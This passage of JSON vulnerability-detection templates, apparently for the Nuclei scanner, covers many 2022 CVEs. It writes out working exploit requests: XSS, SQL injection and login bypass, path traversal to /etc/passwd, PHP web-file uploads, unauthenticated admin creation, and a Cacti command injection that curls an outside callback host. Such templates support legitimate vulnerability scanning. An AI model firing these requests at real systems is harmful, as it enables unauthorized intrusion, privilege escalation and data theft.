{{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>confirm(document.domain)</script>","updraftplus"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-31982","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31980","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28023","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_supplier HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; 